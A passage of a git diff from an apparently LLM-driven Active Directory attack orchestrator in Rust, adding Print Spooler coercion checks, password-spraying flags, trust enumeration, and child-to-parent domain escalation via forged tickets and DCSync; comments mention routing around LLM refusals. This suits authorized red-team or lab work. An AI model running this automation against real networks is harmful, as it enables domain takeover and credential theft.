+ let domain = "contoso.local";
+ let cred_domain = "CONTOSO.LOCAL";
+ assert_eq!(cred_domain.to_lowercase(), domain.to_lowercase());
+ }
+
+ #[test]
+ fn credential_domain_matching_empty_skips() {
+ let domain = "".to_string();
+ let cred_domain = "contoso.local";
+ let matches = !domain.is_empty() && cred_domain.to_lowercase() == domain.to_lowercase();
+ assert!(!matches);
+ }
+
+ #[test]
+ fn smb_enum_work_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = SmbEnumWork {
+ dedup_key: "smb_auth_enum:192.168.58.22".into(),
+ target_ip: "192.168.58.22".into(),
+ hostname: "srv01.contoso.local".into(),
+ domain: "contoso.local".into(),
+ credential: cred,
+ };
+ assert_eq!(work.target_ip, "192.168.58.22");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn empty_services_no_smb() {
+ let services: Vec = vec![];
+ let has_smb = services.iter().any(|s| {
+ let sl = s.to_lowercase();
+ sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+ });
+ assert!(!has_smb);
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/spooler_check.rs b/ares-cli/src/orchestrator/automation/spooler_check.rs
new file mode 100644
index 00000000..4815cfb2
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/spooler_check.rs
@@ -0,0 +1,376 @@
+//! auto_spooler_check -- detect Print Spooler service on discovered hosts.
+//!
+//! The Print Spooler service (MS-RPRN) is a common coercion vector: if running,
+//! PrinterBug (SpoolSample) can force the machine to authenticate to an attacker
+//! listener. It's also a prerequisite for PrintNightmare (CVE-2021-1675).
+//!
+//! This is a recon bridge: it dispatches a check per host and registers
+//! `spooler_enabled` vulnerabilities that downstream coercion/CVE modules target.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+fn collect_spooler_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for host in &state.hosts {
+ let dedup_key = format!("spooler:{}", host.ip);
+ if state.is_processed(DEDUP_SPOOLER_CHECK, &dedup_key) {
+ continue;
+ }
+
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(SpoolerWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Checks discovered hosts for Print Spooler service availability.
+/// Interval: 45s.
+pub async fn auto_spooler_check(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("spooler_check") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_spooler_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "spooler_check",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("spooler_check");
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "Print Spooler check dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_SPOOLER_CHECK, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_SPOOLER_CHECK, &item.dedup_key)
+ .await;
+
+ // Register spooler_enabled vulnerability proactively so it
+ // appears in reports. The agent's report_finding callback
+ // only logs — this ensures the finding is durable.
+ let vuln = ares_core::models::VulnerabilityInfo {
+ vuln_id: format!("spooler_{}", item.target_ip.replace('.', "_")),
+ vuln_type: "spooler_enabled".to_string(),
+ target: item.target_ip.clone(),
+ discovered_by: "auto_spooler_check".to_string(),
+ discovered_at: chrono::Utc::now(),
+ details: {
+ let mut d = std::collections::HashMap::new();
+ d.insert("target_ip".to_string(), json!(item.target_ip));
+ d.insert("hostname".to_string(), json!(item.hostname));
+ d.insert("domain".to_string(), json!(item.domain));
+ d.insert(
+ "description".to_string(),
+ json!("Print Spooler service (MS-RPRN) is running. Enables PrinterBug coercion and is a prerequisite for PrintNightmare (CVE-2021-1675)."),
+ );
+ d
+ },
+ recommended_agent: "privesc".to_string(),
+ priority: dispatcher.effective_priority("spooler_check"),
+ };
+
+ match dispatcher
+ .state
+ .publish_vulnerability_with_strategy(
+ &dispatcher.queue,
+ vuln,
+ Some(&dispatcher.config.strategy),
+ )
+ .await
+ {
+ Ok(true) => {
+ info!(
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "Print Spooler enabled — vulnerability registered"
+ );
+ }
+ Ok(false) => {}
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to publish spooler vulnerability");
+ }
+ }
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "Spooler check deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch spooler check");
+ }
+ }
+ }
+ }
+}
+
+struct SpoolerWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("spooler:{}", "192.168.58.22");
+ assert_eq!(key, "spooler:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_SPOOLER_CHECK, "spooler_check");
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_spooler_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ let work = collect_spooler_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_host_with_credential_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.22");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dedup_key, "spooler:192.168.58.22");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_hosts_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 2);
+ let ips: Vec<&str> = work.iter().map(|w| w.target_ip.as_str()).collect();
+ assert!(ips.contains(&"192.168.58.22"));
+ assert!(ips.contains(&"192.168.58.23"));
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed_host() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into());
+ let work = collect_spooler_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed_keeps_unprocessed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .hosts
+ .push(make_host("192.168.58.23", "srv02.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(DEDUP_SPOOLER_CHECK, "spooler:192.168.58.22".into());
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.23");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ }
+
+ #[test]
+ fn collect_falls_back_to_first_credential() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.22", "srv01.contoso.local"));
+ // Only fabrikam credential available for contoso host
+ state
+ .credentials
+ .push(make_credential("fabuser", "Fab!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "fabuser");
+ }
+
+ #[test]
+ fn collect_host_without_fqdn_gets_empty_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.22", "srv01"));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_spooler_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ // Falls back to first credential since domain is empty
+ assert_eq!(work[0].credential.username, "admin");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/stall_detection.rs b/ares-cli/src/orchestrator/automation/stall_detection.rs
index 9b160bcf..181470ce 100644
--- a/ares-cli/src/orchestrator/automation/stall_detection.rs
+++ b/ares-cli/src/orchestrator/automation/stall_detection.rs
@@ -161,6 +161,7 @@ pub async fn auto_stall_detection(
"target_ip": dc_ip,
"domain": domain,
"use_common_passwords": true,
+ "acknowledge_no_policy": true,
});
match dispatcher
diff --git a/ares-cli/src/orchestrator/automation/trust.rs b/ares-cli/src/orchestrator/automation/trust.rs
index 598871ca..f46a018e 100644
--- a/ares-cli/src/orchestrator/automation/trust.rs
+++ b/ares-cli/src/orchestrator/automation/trust.rs
@@ -9,6 +9,7 @@
//! 3. **Trust follow**: When a trust account hash is found, dispatch inter-realm
//! ticket creation and secretsdump against the foreign DC.
+use std::collections::HashSet;
use std::sync::Arc;
use std::time::Duration;
@@ -16,6 +17,8 @@ use serde_json::json;
use tokio::sync::watch;
use tracing::{debug, info, warn};
+use ares_llm::ToolCall;
+
use crate::orchestrator::dispatcher::Dispatcher;
use crate::orchestrator::state::*;
@@ -42,6 +45,150 @@ fn trust_account_name(flat_name: &str) -> String {
format!("{}$", flat_name.to_uppercase())
}
+/// Returns true when source and target are in different forests
+/// (neither is a parent or child of the other, and they are not equal).
+///
+/// Inter-forest trusts are subject to SID filtering on the target DC, which
+/// strips ExtraSid claims with RID < 1000 (Enterprise Admins, Domain Admins,
+/// Administrator). The inter-realm TGT authenticates but the privileged claim
+/// is silently dropped — DCSync against the target DC then fails with
+/// `rpc_s_access_denied`. This helper distinguishes the doomed path from
+/// child→parent escalation (intra-forest), which is exploitable.
+fn is_inter_forest(source: &str, target: &str) -> bool {
+ let s = source.to_lowercase();
+ let t = target.to_lowercase();
+ if s.is_empty() || t.is_empty() || s == t {
+ return false;
+ }
+ if s.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{s}")) {
+ return false;
+ }
+ true
+}
+
+/// Returns true if the trust source→target is inter-forest with SID filtering
+/// active — meaning `forge_inter_realm_and_dump` will be rejected at DCSync
+/// regardless of trust key validity. Caller should suppress the doomed
+/// dispatch and accelerate cross-forest fallback paths instead.
+///
+/// Decision tree:
+/// - Intra-forest (child↔parent or same domain): false (raise_child handles it)
+/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=true`: true
+/// - Explicit `TrustInfo` with `is_cross_forest()` and `sid_filtering=false`:
+/// false (someone disabled SID filtering — try the forge)
+/// - No `TrustInfo` but the names are inter-forest: false (try the forge —
+/// missing metadata means we can't be sure SID filtering is on, and the
+/// ~30s cost of an unnecessary attempt is cheaper than silently dropping
+/// a valid attack path on a misconfigured trust)
+fn is_filtered_inter_forest_trust(state: &StateInner, source: &str, target: &str) -> bool {
+ if !is_inter_forest(source, target) {
+ return false;
+ }
+ let target_l = target.to_lowercase();
+ // Look up only the target's metadata. `trusted_domains` is keyed by the
+ // foreign-side domain name in each enumeration result, so the entry for
+ // `target_l` describes the source→target relationship. Falling back to
+ // the source key returns *some other* trust the source happens to have
+ // (e.g. child→contoso parent_child stored under "contoso.local"
+ // when we query contoso→fabrikam), which would wrongly classify the
+ // unknown cross-forest path as intra-forest and let the doomed forge fire.
+ if let Some(t) = state.trusted_domains.get(&target_l) {
+ if t.is_cross_forest() {
+ return t.sid_filtering;
+ }
+ // Trust enumeration disagrees with name-based heuristic — trust the
+ // explicit metadata (e.g. unusual same-forest cross-DNS-suffix setup).
+ return false;
+ }
+ // No metadata — try the forge. False positives (SID filtering actually on)
+ // cost ~30s for a doomed DCSync attempt; false negatives (refusing a valid
+ // attack on a misconfigured trust where SID filtering is off) cost the
+ // entire foreign domain. Prefer the cheaper failure mode.
+ false
+}
+
+/// Clear cross-forest fallback dedup keys for `target_domain` so the next
+/// tick of `auto_cross_forest_enum`, `auto_foreign_group_enum`, and
+/// `auto_acl_discovery` re-fires against the foreign forest with current
+/// credentials. Called when a doomed forest_trust_escalation is suppressed
+/// — the trust hash extraction usually populates new state (DC IPs, SIDs)
+/// that should kick the fallbacks back into action.
+async fn wake_cross_forest_fallbacks(dispatcher: &Dispatcher, target_domain: &str) {
+ let target_l = target_domain.to_lowercase();
+ // (set_name, prefix) pairs — must stay in sync with the auto_*_enum
+ // dedup-key formats in their respective modules.
+ let mut prefixes: Vec<(&str, String)> = vec![
+ (DEDUP_CROSS_FOREST_ENUM, format!("xforest:{target_l}:")),
+ (
+ DEDUP_FOREIGN_GROUP_ENUM,
+ format!("foreign_group:{target_l}"),
+ ),
+ (DEDUP_ACL_DISCOVERY, format!("acl_disc:{target_l}:")),
+ ];
+
+ // ADCS dedup keys are `{host}:cred:{user@dom}` / `{host}:hash:{user@dom}`,
+ // keyed on the CA host (IP or hostname) — not the target domain. So for
+ // each known host that belongs to `target_domain`, add a `{host}:` prefix.
+ // This lets a freshly-acquired cross-forest credential re-attempt
+ // certipy_find against a fabrikam CA that was previously locked by a wrong
+ // initial cred.
+ {
+ let s = dispatcher.state.read().await;
+ let suffix = format!(".{target_l}");
+ for h in s.hosts.iter() {
+ let hostname = h.hostname.to_lowercase();
+ let belongs =
+ !hostname.is_empty() && (hostname == target_l || hostname.ends_with(&suffix));
+ if !belongs {
+ continue;
+ }
+ if !h.ip.is_empty() {
+ prefixes.push((DEDUP_ADCS_SERVERS, format!("{}:", h.ip)));
+ }
+ prefixes.push((DEDUP_ADCS_SERVERS, format!("{hostname}:")));
+ }
+ }
+
+ let cleared: Vec<(&str, Vec)> = {
+ let mut s = dispatcher.state.write().await;
+ prefixes
+ .iter()
+ .map(|(set, prefix)| (*set, s.unmark_processed_by_prefix(set, prefix)))
+ .filter(|(_, v)| !v.is_empty())
+ .collect()
+ };
+ let cleared_count: usize = cleared.iter().map(|(_, v)| v.len()).sum();
+ if cleared_count == 0 {
+ // Nothing to clear means ACL/cross-forest enum never ran against this
+ // target — usually because no same-realm credential exists. Fallback
+ // wake is a no-op here; the orchestrator will keep flailing on
+ // NTLM-bound paths that 0x52e against the foreign forest. Logging
+ // this signal makes the architectural gap visible in the trace.
+ info!(
+ target = %target_domain,
+ "wake_cross_forest_fallbacks: no dedup keys to clear — \
+ ACL/foreign-group/cross-forest enum never registered for this \
+ target (likely no same-realm credential). Forge-only fallback \
+ via create_inter_realm_ticket would be needed to bind LDAP \
+ via Kerberos."
+ );
+ } else {
+ info!(
+ target = %target_domain,
+ cleared_count,
+ "wake_cross_forest_fallbacks: cleared dedup keys to retrigger fallback enums"
+ );
+ }
+ for (set, keys) in cleared {
+ for key in keys {
+ let _ = dispatcher
+ .state
+ .unpersist_dedup(&dispatcher.queue, set, &key)
+ .await;
+ }
+ }
+}
+
/// Check if a credential domain matches a target domain (exact, child, or parent).
fn is_domain_related(cred_domain: &str, target_domain: &str) -> bool {
let cd = cred_domain.to_lowercase();
@@ -81,25 +228,38 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
// Two dedup keys per domain:
// trust_enum: — password-based attempt
// trust_enum_hash: — hash-based retry (for dominated domains)
- let enum_work: Vec<(String, String, String)> = state
+ //
+ // Iterate the union of `domain_controllers` keys and
+ // `dominated_domains`. The latter covers the case where a
+ // domain was compromised (e.g. via raise_child to the parent)
+ // but its DC was never explicitly seeded into
+ // `domain_controllers` — without this, parent-DC trust
+ // enumeration would never fire and cross-forest trusts would
+ // remain undiscovered.
+ let mut candidate_domains: HashSet = state
.domain_controllers
+ .keys()
+ .map(|d| d.to_lowercase())
+ .collect();
+ for d in state.dominated_domains.iter() {
+ candidate_domains.insert(d.to_lowercase());
+ }
+ let enum_work: Vec<(String, String, String)> = candidate_domains
.iter()
- .filter(|(domain, _)| {
- let key = trust_enum_dedup_key(domain, false);
- let hash_key = trust_enum_dedup_key(domain, true);
- !state.is_processed(DEDUP_TRUST_FOLLOW, &key)
- || (!state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key)
- && state.dominated_domains.contains(&domain.to_lowercase()))
- })
- .map(|(domain, dc_ip)| {
- // Use hash_key if password-based was already tried
+ .filter_map(|domain| {
+ let dc_ip = state.resolve_dc_ip(domain)?;
let pw_key = trust_enum_dedup_key(domain, false);
- let key = if state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key) {
- trust_enum_dedup_key(domain, true)
- } else {
- pw_key
- };
- (key, domain.clone(), dc_ip.clone())
+ let hash_key = trust_enum_dedup_key(domain, true);
+ let pw_done = state.is_processed(DEDUP_TRUST_FOLLOW, &pw_key);
+ let hash_done = state.is_processed(DEDUP_TRUST_FOLLOW, &hash_key);
+ let dominated = state.dominated_domains.contains(domain);
+ // Skip if password attempt is done AND (no hash retry
+ // applies, or hash retry already done).
+ if pw_done && (!dominated || hash_done) {
+ return None;
+ }
+ let key = if pw_done { hash_key } else { pw_key };
+ Some((key, domain.clone(), dc_ip))
})
.collect();
drop(state);
@@ -164,39 +324,152 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
};
if let Some(cred_json) = cred_payload {
- let payload = json!({
- "techniques": ["enumerate_domain_trusts"],
- "target_ip": dc_ip,
+ // Direct tool dispatch — bypass the LLM agent loop.
+ // The recon prompt template did not surface
+ // `credential.hash` (only password), so LLM-driven trust
+ // enumeration with hash auth would render an empty
+ // password and fail with LDAP 52e. The orchestrator
+ // already owns every input here; deliver them directly
+ // to enumerate_domain_trusts via dispatch_tool.
+ let mut args = json!({
+ "target": dc_ip,
"domain": domain,
- "credential": cred_json,
+ "username": cred_json
+ .get("username")
+ .and_then(|v| v.as_str())
+ .unwrap_or(""),
});
+ if let Some(p) = cred_json
+ .get("password")
+ .and_then(|v| v.as_str())
+ .filter(|s| !s.is_empty())
+ {
+ args["password"] = json!(p);
+ }
+ if let Some(h) = cred_json
+ .get("hash")
+ .and_then(|v| v.as_str())
+ .filter(|s| !s.is_empty())
+ {
+ args["hash"] = json!(h);
+ }
+ if let Some(bd) = cred_json
+ .get("domain")
+ .and_then(|v| v.as_str())
+ .filter(|s| !s.is_empty() && !s.eq_ignore_ascii_case(&domain))
+ {
+ args["bind_domain"] = json!(bd);
+ }
+
+ let call = ToolCall {
+ id: format!("trust_enum_{}", uuid::Uuid::new_v4().simple()),
+ name: "enumerate_domain_trusts".to_string(),
+ arguments: args,
+ };
+ let task_id = format!(
+ "trust_enum_{}",
+ &uuid::Uuid::new_v4().simple().to_string()[..12]
+ );
- match dispatcher
- .throttled_submit("recon", "recon", payload, 3)
+ // Mark dedup BEFORE spawn so the next 30s tick doesn't
+ // re-dispatch while enumeration is in flight.
+ dispatcher
+ .state
+ .write()
.await
- {
- Ok(Some(task_id)) => {
- info!(
- task_id = %task_id,
- domain = %domain,
- auth = auth_method,
- "Trust enumeration dispatched"
- );
- dispatcher
+ .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
+ .await;
+
+ info!(
+ task_id = %task_id,
+ domain = %domain,
+ dc_ip = %dc_ip,
+ auth = auth_method,
+ "Dispatching enumerate_domain_trusts (direct tool, no LLM)"
+ );
+
+ let dispatcher_bg = dispatcher.clone();
+ let domain_bg = domain.clone();
+ let key_bg = key.clone();
+ let auth_method_bg = auth_method.to_string();
+ tokio::spawn(async move {
+ let result = dispatcher_bg
+ .llm_runner
+ .tool_dispatcher()
+ .dispatch_tool("recon", &task_id, &call)
+ .await;
+ // Failure handling depends on which auth attempt
+ // just failed:
+ //
+ // - password attempt: leave the dedup mark in place
+ // so the next 30s tick sees `pw_done=true` and
+ // escalates to the hash-key path (gated on the
+ // domain being in `dominated_domains`). Clearing
+ // the mark would loop forever on the same wrong
+ // sibling-domain credential.
+ // - hash attempt: clear so a future tick can retry
+ // if a fresh hash becomes available.
+ let clear_dedup = || async {
+ dispatcher_bg
.state
.write()
.await
- .mark_processed(DEDUP_TRUST_FOLLOW, key.clone());
- let _ = dispatcher
+ .unmark_processed(DEDUP_TRUST_FOLLOW, &key_bg);
+ let _ = dispatcher_bg
.state
- .persist_dedup(&dispatcher.queue, DEDUP_TRUST_FOLLOW, &key)
+ .unpersist_dedup(
+ &dispatcher_bg.queue,
+ DEDUP_TRUST_FOLLOW,
+ &key_bg,
+ )
.await;
+ };
+ let on_failure = || async {
+ if auth_method_bg == "password" {
+ // Mark stays — escalation to hash retry on next tick.
+ } else {
+ clear_dedup().await;
+ }
+ };
+ match result {
+ Ok(exec_result) => {
+ if let Some(err) = exec_result.error.as_ref() {
+ warn!(
+ err = %err,
+ domain = %domain_bg,
+ auth = %auth_method_bg,
+ "enumerate_domain_trusts returned error"
+ );
+ on_failure().await;
+ return;
+ }
+ let trust_count = exec_result
+ .discoveries
+ .as_ref()
+ .and_then(|d| d.get("trusted_domains"))
+ .and_then(|t| t.as_array())
+ .map(|a| a.len())
+ .unwrap_or(0);
+ info!(
+ domain = %domain_bg,
+ trust_count = trust_count,
+ "enumerate_domain_trusts completed"
+ );
+ }
+ Err(e) => {
+ warn!(
+ err = %e,
+ domain = %domain_bg,
+ auth = %auth_method_bg,
+ "enumerate_domain_trusts dispatch errored"
+ );
+ on_failure().await;
+ }
}
- Ok(None) => {
- debug!(domain = %domain, "Trust enum throttled — deferred");
- }
- Err(e) => warn!(err = %e, "Failed to dispatch trust enumeration"),
- }
+ });
}
}
}
@@ -204,47 +477,111 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
// Child-to-parent escalation (ExtraSid via raiseChild)
//
- // When a parent_child trust is discovered and the child domain is dominated,
- // dispatch a child_to_parent exploit task. The LLM prompt offers raiseChild
- // (automated) and manual ExtraSid golden ticket as alternatives.
+ // Dispatches when a child domain is dominated and its parent FQDN is
+ // known. We derive the parent FQDN by stripping the leftmost label of
+ // the dominated child (always valid intra-forest — child FQDN is
+ // `{label}.{parent_fqdn}` by AD construction), then ALSO union with
+ // any explicit parent_child trusts discovered via LDAP enumeration.
+ //
+ // The intra-forest derivation lets us fire immediately on child DA,
+ // bypassing the trust enumeration round-trip — without it we'd block
+ // until `trusted_domains` was populated, which sometimes never
+ // happens (LLM refusal, network, throttle starvation).
{
let state = dispatcher.state.read().await;
- if state.has_domain_admin && !state.trusted_domains.is_empty() {
- let child_work: Vec<(String, String, String, String)> = state
- .trusted_domains
- .values()
- .filter(|trust| trust.is_parent_child())
- .filter_map(|trust| {
- let parent_domain = &trust.domain;
+ // Build the candidate child set as the union of dominated domains
+ // (krbtgt observed) and domains where we have a non-empty
+ // Administrator NTLM hash. The latter covers the common case where
+ // GOAD-style password reuse gives us a working DA hash via local
+ // SAM dumps before we ever DCSync krbtgt — without it the trust
+ // automation deadlocks waiting for krbtgt.
+ let mut candidate_children: HashSet = state
+ .dominated_domains
+ .iter()
+ .map(|d| d.to_lowercase())
+ .collect();
+ for h in state.hashes.iter() {
+ if h.username.eq_ignore_ascii_case("administrator")
+ && h.hash_type.eq_ignore_ascii_case("NTLM")
+ && !h.hash_value.is_empty()
+ && !h.domain.is_empty()
+ {
+ candidate_children.insert(h.domain.to_lowercase());
+ }
+ }
+ if !candidate_children.is_empty() {
+ let mut child_work: Vec<(String, String, String, String)> = Vec::new();
+
+ // Path A: derived intra-forest. For each candidate child (FQDN
+ // with 3+ labels), the parent is `labels[1..].join(".")`.
+ for child_domain in candidate_children.iter() {
+ let cd_lower = child_domain.to_lowercase();
+ let labels: Vec<&str> = cd_lower.split('.').collect();
+ if labels.len() < 3 {
+ continue;
+ }
+ let parent_domain = labels[1..].join(".");
+ if parent_domain.is_empty() || !parent_domain.contains('.') {
+ continue;
+ }
+ if state.dominated_domains.contains(&parent_domain) {
+ continue;
+ }
+ // Require parent DC IP resolvable (via domain_controllers
+ // or hosts table) so secretsdump has a target IP.
+ let parent_dc_ip = match state.resolve_dc_ip(&parent_domain) {
+ Some(ip) => ip,
+ None => continue,
+ };
+ let key = format!("raise_child:{}", cd_lower);
+ if state.is_processed(DEDUP_TRUST_FOLLOW, &key) {
+ continue;
+ }
+ let child_dc_ip = match state.domain_controllers.get(&cd_lower) {
+ Some(ip) => ip.clone(),
+ None => continue,
+ };
+ let _ = parent_dc_ip; // resolved later under fresh read lock
+ child_work.push((key, child_domain.clone(), parent_domain, child_dc_ip));
+ }
- // Skip if parent is already dominated
+ // Path B: explicit parent_child trusts from LDAP enumeration.
+ // Skip duplicates of Path A (same dedup key).
+ if !state.trusted_domains.is_empty() {
+ for trust in state.trusted_domains.values() {
+ if !trust.is_parent_child() {
+ continue;
+ }
+ let parent_domain = trust.domain.clone();
if state
.dominated_domains
.contains(&parent_domain.to_lowercase())
{
- return None;
+ continue;
}
-
- // Find a dominated child domain for this parent
- // (child FQDN ends with .{parent})
- let child_domain = state.dominated_domains.iter().find(|d| {
+ let child_domain = match candidate_children.iter().find(|d| {
d.to_lowercase()
.ends_with(&format!(".{}", parent_domain.to_lowercase()))
- })?;
-
+ }) {
+ Some(d) => d.clone(),
+ None => continue,
+ };
let key = format!("raise_child:{}", child_domain.to_lowercase());
if state.is_processed(DEDUP_TRUST_FOLLOW, &key) {
- return None;
+ continue;
}
+ if child_work.iter().any(|(k, _, _, _)| k == &key) {
+ continue;
+ }
+ let child_dc_ip =
+ match state.domain_controllers.get(&child_domain.to_lowercase()) {
+ Some(ip) => ip.clone(),
+ None => continue,
+ };
+ child_work.push((key, child_domain, parent_domain, child_dc_ip));
+ }
+ }
- let dc_ip = state
- .domain_controllers
- .get(&child_domain.to_lowercase())
- .cloned()?;
-
- Some((key, child_domain.clone(), parent_domain.clone(), dc_ip))
- })
- .collect();
drop(state);
for (key, child_domain, parent_domain, dc_ip) in child_work {
@@ -347,13 +684,24 @@ pub async fn auto_trust_follow(dispatcher: Arc, mut shutdown: watch:
// Dispatch child-to-parent exploit task. The LLM prompt
// offers raiseChild (automated) and manual ExtraSid golden
// ticket creation as alternatives.
+ // `dc_ip` is the child DC (for trust key extraction).
